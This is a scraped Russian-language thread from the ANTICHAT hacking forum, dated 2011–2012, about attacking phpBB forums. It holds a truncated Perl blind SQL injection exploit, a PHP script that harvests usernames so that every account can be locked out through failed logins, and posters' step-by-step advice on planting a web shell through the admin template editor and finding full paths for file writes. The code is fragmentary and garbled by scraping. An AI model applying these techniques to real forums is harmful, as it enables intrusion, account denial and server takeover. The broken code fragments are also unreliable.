ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.02.2011, 21:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
313
Репутация:
0
|
|
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
[CODE]
Code:
#!/usr/bin/perl # --------------------------------------------------------------- # phpBB 3 (Mod Tag Board get($host.injection($i,$chars[$j])); $time2 = time(); if($time2 - $time1 > 6) { syswrite(STDOUT,chr($chars[$j])); $hash .= chr($chars[$j]); last; } if($i == 1 && length $hash
|
|
|
|
13.02.2011, 19:12
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Уязвимость в phpbb 2.0.19
Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.
Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).
Эксплоит (написан на php)
Собирает в файл Ники всех пользователей форума.
Код:
Code:
Профиль пользователя (.*)/i",$str,$return))
{if(trim($return[1])!=**)
{fputs($file,"$return[1]\n");
}}}}
fclose($file);
fclose($sock);
?>
Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:
1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)
2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)/i",$str,$return))
в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле Юзер - Lamer
то переписываем preg_match как
preg_match("/Юзер - (.*)/i",$str,$return))
Сам сплоит
Защита
Убрать ограничение на число входов с неправильным паролем или увеличить его число через админку форума.
|
|
|
11.12.2011, 11:44
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791
Репутация:
265
|
|
Есть какие нибудь способы заливки шелла в 3.0.9 ?
Админ аккаунт имеется..
|
|
|
|
13.12.2011, 01:06
|
|
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
Провел на форуме:
1763379
Репутация:
155
|
|
А в 3.0.8 есть возможность залить? Админка есть
|
|
|
|
14.12.2011, 06:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
stepashka_, cylaaan =>
1. /showpost.php?p=198446&postcount=3
2. 1) Вкладка общие --> Безопасность
Разрешить php в шаблонах: Да
2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
С помощью встроенного редактора шаблонов выбираем файл и пишем в него:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]phpinfo[/COLOR][COLOR="#007700"](); [/COLOR][/COLOR]
Далее применяем шаблон, идем на измененную страницу и видим наш php код |
|
|
|
15.01.2012, 18:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
phpBB => `Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group` Тип: полный путь.
Необходимо:админская учётная запись.
1.)Заходим в администраторскую панель.
2.)Переходим на вкладку PHPBB SEO.
3.)Находим на этой страничке "The cache folder configured is" и после этих слов и будет полный путь.
P.S Полезно, если file_priv=Y, а пути мы не знаем |
|
|
|
16.01.2012, 00:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
Osstudio, данная вкладка не является стандартной для форума phpBB3, она является управляющей частью дополнения phpBB SEO от одноимённой команды www.phpbb-seo.com
Определить наличие данной модификации можно по значку  внизу форума.
|
|
|
|
16.01.2012, 19:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Сообщение от SecondLife
SecondLife said:
Osstudio
, данная вкладка не является стандартной для форума phpBB3, она является управляющей частью дополнения
phpBB SEO
от одноимённой команды www.phpbb-seo.com
Определить наличие данной модификации можно по значку
внизу форума. А, ясно
|
|
|
|
21.01.2012, 03:11
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
шелл в стилях, для редактирования шаба доступны только два файла
overall_header.html и ph.html
куда они инклудятся?
|
|
|
|
21.01.2012, 03:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
225312
Репутация:
-6
|
|
Сообщение от faza02
faza02 said:
шелл в стилях, для редактирования шаба доступны только два файла
overall_header.html
и
ph.html
куда они инклудятся?
путь чтоли, в /template.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид